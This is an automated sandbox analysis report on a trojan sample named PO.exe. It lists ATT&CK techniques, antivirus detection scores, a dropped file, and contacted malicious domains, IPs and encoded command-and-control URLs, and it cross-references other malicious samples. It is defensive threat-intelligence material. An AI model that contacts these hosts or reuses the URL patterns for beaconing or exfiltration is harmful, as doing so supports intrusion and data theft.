Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection812	Access Token Manipulation1	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion31	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Process Injection812	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Deobfuscate/Decode Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Hidden Files and Directories1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Obfuscated Files or Information3	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Software Packing1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PO.exe	40%	Virustotal		Browse
PO.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
PO.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
11.2.AddInProcess32.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
www.adanahabernet.com	0%	Virustotal		Browse
td-balancer-euw2-6-109.wixdns.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ	0%	Avira URL Cloud	safe
http://www.adanahabernet.com/sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://www.sidepiecebags.com/sawc?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN	0%	Avira URL Cloud	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://ns.adobe.cobj	0%	URL Reputation	safe
http://www.mitraberdaya.com/sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X	0%	Avira URL Cloud	safe
http://ns.d	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://www.wwwflixxy.com/sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X	0%	Avira URL Cloud	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://ns.adobe.c/g	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sidepiecebags.com/sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
www.retro-e-scooter.com/sawc/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe
http://ns.ado/1	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.adanahabernet.com	172.120.90.239	true	true	0%, Virustotal, Browse	unknown
td-balancer-euw2-6-109.wixdns.net	35.246.6.109	true	false	0%, Virustotal, Browse	unknown
mitraberdaya.com	5.181.216.112	true	true		unknown
www.marienish.com	88.198.220.232	true	true		unknown
www.wwwflixxy.com	81.17.18.197	true	true		unknown
www.swpszx.com	unknown	unknown	true		unknown
www.sidepiecebags.com	unknown	unknown	true		unknown
www.mitraberdaya.com	unknown	unknown	true		unknown
www.oaisdjoqwekxc.info	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.marienish.com/sawc/?lf=CZ6X&nN60m=Yt32z530e2tITcOEW5SVHb5yrIELojDg7+FgI5/ZTK76GuoPLgYuVmd8rLeapbOqeXRQ	true	Avira URL Cloud: safe	unknown
http://www.adanahabernet.com/sawc/?lf=CZ6X&nN60m=LtE+xZw49qZxNGHwe/5duJoxTMG7p0RZVZ9/xidjWtVQjRXR0IRVZ3163NMz7MOSj/bw	true	Avira URL Cloud: safe	unknown
http://www.mitraberdaya.com/sawc/?nN60m=ZLBYf+dvKraj5xhFECL+Ta+rlTPSnPltnvpHOwD/x7pMqcIuVlTqLuPQwCL73z9ijdq8&lf=CZ6X	true	Avira URL Cloud: safe	unknown
http://www.wwwflixxy.com/sawc/?nN60m=oHoe0+b7kBAmda/0Hio/bDRlPufoMqcyuQMuAHeH1TSMS98bQSjEeWPHvQ043L9SYNbL&lf=CZ6X	true	Avira URL Cloud: safe	unknown
http://www.sidepiecebags.com/sawc/?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN3GO43/2+iRXsYUADi	false	Avira URL Cloud: safe	unknown
www.retro-e-scooter.com/sawc/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.sidepiecebags.com/sawc?lf=CZ6X&nN60m=tBYTJLloxChiPW5nd8ZkTRTjZAEjhK8ruaBpTwz2qB9ROPU5gMN	wlanext.exe, 00000011.00000002.910661249.00000000033E2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.adobe.cobj	PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://ns.d	PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/g	PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schema.org/WebPage	PO.exe, 00000000.00000002.753579067.0000000002AB0000.00000004.00000001.sdmp, PO.exe, 00000000.00000002.753609790.0000000002AC7000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://crl.pki.goog/GTS1O1core.crl0	PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 0000000F.00000000.754393079.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	PO.exe, 00000000.00000002.752842533.0000000000C41000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO.exe, 00000000.00000002.753550210.0000000002A81000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 0000000F.00000000.775921775.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ns.ado/1	PO.exe, 00000000.00000003.665827004.0000000006C9E000.00000004.00000001.sdmp, PO.exe, 00000000.00000003.744720624.0000000006CA3000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.120.90.239	www.adanahabernet.com	United States	18779	EGIHOSTINGUS	true
35.246.6.109	td-balancer-euw2-6-109.wixdns.net	United States	15169	GOOGLEUS	false
5.181.216.112	mitraberdaya.com	Germany	59637	ASRSINETRU	true
88.198.220.232	www.marienish.com	Germany	24940	HETZNER-ASDE	true
81.17.18.197	www.wwwflixxy.com	Switzerland	51852	PLI-ASCH	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385455
Start date:	12.04.2021
Start time:	14:41:38
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PO.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/2@7/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 10.5% (good quality ratio 9.3%) Quality average: 71.8% Quality standard deviation: 32.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 100 Number of non-executed functions: 171
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.64.90.137, 131.253.33.200, 13.107.22.200, 20.82.210.154, 92.122.145.220, 52.255.188.83, 172.217.168.68, 104.43.193.48, 20.50.102.62, 92.122.213.194, 92.122.213.247, 52.155.217.156, 2.20.142.210, 2.20.142.209, 13.88.21.125, 20.54.26.129, 104.42.151.234, 204.79.197.200, 13.107.21.200, 168.61.161.212 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, www.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:42:36	API Interceptor	205x Sleep call for process: PO.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
81.17.18.197	New order.exe	Get hash	malicious	Browse	www.websturantstores.com/n30n/?GdIH=G/DzMx+d204CF5AP88QxeqS6sJNTz4LLrkYR9BUBvxQsmK0qcscpTEXEOebQ5Jlvr4pR&Ajn=6lNDphQHVxzXvzn0
	ba2Eq178BGXyW5T.exe	Get hash	malicious	Browse	www.creditccu.com/saeo/?VR-XC=+LK2db7d1C228uPLxd5ygJhrKKw4PmObcrVrj8h4try9Uk2AkyD+T0eEdOxWELiRHlqOhJ++0Q==&EzrLKJ=7nolpl80-0_l
	ARBmDNJS7m.exe	Get hash	malicious	Browse	www.thesahwfam.com/aqu2/?rPj0Qr6=5EjXvdr19C9mZVkY3fKTgvDOgP0S6WDmsKJe/OA2LcJULTMy4Vts0y1eMnfEeD++X6ym&tXrx=gdkpfvSpm
	bank details.exe	Get hash	malicious	Browse	www.websturantstores.com/n30n/?ofl4i=G/DzMx+d204CF5AP88QxeqS6sJNTz4LLrkYR9BUBvxQsmK0qcscpTEXEOd3Al45UsNAAJIiFew==&1bj=3fb4MJahNHJTdZ
	MV Sky Marine_pdf.exe	Get hash	malicious	Browse	www.maggionaossurvey.com/m2be/?t8r=Pmzzl7xNdTjxpE7TKPUfs2K+Zd8HAaj1ahYlw/e4QxTLjn1ka96YHmJ+nuPWA19CGBx9&1bYxT=mTfpcdW
	Fully Executed Contract.xlsx	Get hash	malicious	Browse	www.moivimghelp.com/3ueg/?cFN=M2dMggRa+qWs+54KRtLORvUVTY3BOmPoqQphpI9D42oERes0GK1zt/GfhBnBSuZgn3IDVw==&PBU=dpg8g
	orii11.exe	Get hash	malicious	Browse	www.coolsymblo.com/mdi/?8pp=NaWvyIyy6QtsmFQzCOhmEvnUVIUE4plx5JQMET6U2PY7MLGNGTu8WAtHnoy0dEU0LGP5&sZCx=1bYdfPf8ef5pjPm
	PO 20211602.xlsm	Get hash	malicious	Browse	www.amazoncereer.com/idir/?ndy0WrQ=MuSSFaLFnaMdG5ibhe0jYYgED5+p3qyI7K0s64CtauJfWqjMgz6S47xVu4TyimxOQR+o&pN=EXs8wvhx9TEL
	QUOTATION REQUEST_0000564.xlsx	Get hash	malicious	Browse	www.evalinkapuppets.com/wgn/?BL=yzrxAV8xG&3ftx=jh72N97QMkwfO2d3KYrqs0yYsyG8v2l7CsNzN+j5IlsYV6bX9tr3/MROXW68KV2j/aiHNw==
	2WiiGHszyC.exe	Get hash	malicious	Browse	www.lakeviewbarbershonola.com/gqx2/?6l=Ie6QWhcnBKw0CGg1XJOkUi0EQjBhFk91sVnWxFvJgDqo9wqAijnneb/Qtq5IK98OLw5iavE1Ug==&2dB=2dkhLvNpOPY4xHI
	Mv Tiger Flame.xlsx	Get hash	malicious	Browse	www.stonescapes1.com/de92/?2dL=7nU0-8b&mrj830Qp=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
	5DY3NrVgpI.exe	Get hash	malicious	Browse	www.stonescapes1.com/de92/?AjR=9r4L1&FdC4E2D=FMDFc6rLlu1wjKmkr6r3BpbflKlZCzzEN16L5n5vdoOueqP/ceb71sNk2mpWEx2I2yJYLkA5Ng==
	BSL 21 PYT.xlsx	Get hash	malicious	Browse	www.stonescapes1.com/de92/?3fy=ixoxnF3htbYD4&MBZ84N=FMDFc6rOlp10jaqop6r3BpbflKlZCzzEN1iblkluZIOvebj5bOK3jo1m1AppDhOD0Sh+SQ==
	cap.exe	Get hash	malicious	Browse	www.19studies.com/llp/?1b8xixO=W1JrZVtpqksa30DvZh28hoNS2Q7wajXPDOYu4PqWibNCQENdzEfDU2VKEwSNgVf8dnqp&k2Jdyb=fDHXWLx0Sx
	http://gmai.com	Get hash	malicious	Browse	gmai.com/
	oqTdpbN5rF.exe	Get hash	malicious	Browse	www.bikininbodymommy.com/kgw/?NTlTsb=o2J8lThHmJUlqtc0&0V0hlT=nwMujlop9k/e7RKxDV6F2DOpfZu+NAvKA+XHz2bBew91D/bKU35KPyupQFDW23mxRXA2
	DEBIT NOTE DB-1130.exe	Get hash	malicious	Browse	www.finerfinishdetailing.com/ihm3/?sBZ4lrK=MVHj8NpKUi/kGq2WqPWtWe1kfEepi50iLMi17zPtoBo45+X1i5KOEOTiX88XpshQg/Q0Y5LK0A==&FPcT7b=djCDfFRXOP7H
	http://myyaccountnow.com	Get hash	malicious	Browse	myyaccountnow.com/?js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYwNTcwMTU5NiwiaWF0IjoxNjA1Njk0Mzk2LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycDQ5NTJ0dGQxMDMwZnR0cDAxZWxubTUiLCJuYmYiOjE2MDU2OTQzOTYsInRzIjoxNjA1Njk0Mzk2MDMzMTIwfQ.qFDQ8y0csGQT92fLLCPmRXUt_UrqrT-zHf2KaXfP-u0&sid=ac6e8996-2986-11eb-b228-d22dece2e20a
	SHIPMENT DOCUMENT.xlsx	Get hash	malicious	Browse	www.0rdergreatcourses.com/tlu/?ebc8=E2JdjN_822M&Kpjp=2k86lJNvHQKwDeUOqSMVod6dwHgOLn8Zxtyr2GR3VPN3S1v7/B94SfkTMW/EDa2JnIoDVA==
	PI210941.exe	Get hash	malicious	Browse	www.1stsibs.com/t4vo/?o2J=2GWkw3XktBIuKu1KSFtried+VROsZF7cAlDwF3yw8T8b5m0lJCV39rV8wy2v/JxKv+u9&4h0=vZR8DbS8Z4yXah

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASRSINETRU	SwiftMT103.xlsx	Get hash	malicious	Browse	5.181.216.106
	PO4308.exe	Get hash	malicious	Browse	5.181.216.83
	ORIGINAL SHIPPING DOCUMENTSPDF.exe	Get hash	malicious	Browse	5.181.216.71
	POWPO-201209-248-INV10981-PI100833-Waycos20210225.xlsx	Get hash	malicious	Browse	5.181.218.13
	BUNKRequsition_Mar 2021.xlsx	Get hash	malicious	Browse	5.181.218.13
	RPI_Scanned_30957.doc	Get hash	malicious	Browse	5.181.216.140
	61vPFITGkbgCrMT.exe	Get hash	malicious	Browse	5.181.218.55
	6tivtkKtQx.exe	Get hash	malicious	Browse	5.181.216.100
	v07PSzmSp9.exe	Get hash	malicious	Browse	5.181.216.100
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	5.181.218.55
	invoice 2021.xlsx	Get hash	malicious	Browse	5.181.216.120
	worked.exe	Get hash	malicious	Browse	5.181.216.120
	VCS58GQMhuCYghC.exe	Get hash	malicious	Browse	5.181.218.55
	3KvCNpcQ6tvwKr5.exe	Get hash	malicious	Browse	5.181.218.55
	xPkiX7vwNVqQf9I.exe	Get hash	malicious	Browse	5.181.216.115
	Y75vU558UfuGbzM.exe	Get hash	malicious	Browse	5.181.218.55
	5YfNeXk1f0wrxXm.exe	Get hash	malicious	Browse	5.181.218.55
	t1XJOlYvhExZyrm.exe	Get hash	malicious	Browse	5.181.218.55
	JdtN8nIcLi8RQOi.exe	Get hash	malicious	Browse	5.181.218.55
	FtLroeD5Kmr6rNC.exe	Get hash	malicious	Browse	5.181.216.115
HETZNER-ASDE	Anmodning om tilbud 12-04-2021#U00b7pdf.exe	Get hash	malicious	Browse	195.201.225.248
	SecuriteInfo.com.Trojan.Packed.24465.17731.exe	Get hash	malicious	Browse	148.251.48.16
	SecuriteInfo.com.Trojan.Packed.24465.12290.exe	Get hash	malicious	Browse	148.251.48.16
	SecuriteInfo.com.Trojan.Packed.24465.2847.exe	Get hash	malicious	Browse	148.251.48.16
	Bank Details.xlsx	Get hash	malicious	Browse	144.76.242.196
	R496CkgPqa.exe	Get hash	malicious	Browse	195.201.225.248
	qTlPus8IDT.exe	Get hash	malicious	Browse	195.201.225.248
	phantom.exe	Get hash	malicious	Browse	195.201.225.248
	output(1).exe	Get hash	malicious	Browse	95.216.186.40
	C++ Dropper.exe	Get hash	malicious	Browse	88.99.66.31
	rGnw6yNeQi.exe	Get hash	malicious	Browse	195.201.225.248
	89BA6CA01979A51DD5E8FEE7D80E8D69322531BA35775.exe	Get hash	malicious	Browse	136.243.104.235
	IJht2pqbVh.exe	Get hash	malicious	Browse	88.99.66.31
	tdGFhgEQeh.exe	Get hash	malicious	Browse	195.201.225.248
	rnd382WXs3.exe	Get hash	malicious	Browse	195.201.225.248
